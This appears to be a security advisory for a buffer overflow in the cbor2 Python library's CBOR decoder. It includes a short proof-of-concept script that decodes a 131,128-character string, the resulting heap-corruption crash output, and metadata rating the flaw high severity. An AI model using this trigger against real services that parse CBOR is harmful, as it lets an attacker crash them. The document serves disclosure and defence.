Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)
import json
import concurrent.futures
import cbor2
def test():
obj = "x" * 131128
cbor_enc = cbor2.dumps(obj)
return cbor2.loads(cbor_enc)
with concurrent.futures.ProcessPoolExecutor() as executor:
future = executor.submit(test)
print(future.result())
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
File "test.py", line 14, in <module>
print(future.result())
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
return self.__get_result()
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.
import json
import cbor2
def test():
obj = "x" * 131128
cbor_enc = cbor2.dumps(obj)
return cbor2.loads(cbor_enc)
print(test())
Traceback (most recent call last):
File "test.py", line 12, in <module>
print(test())
File "test.py", line 9, in test
return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
{ "nvd_published_at": "2024-02-19T23:15:07Z", "cwe_ids": [ "CWE-120" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-02-21T00:09:03Z" }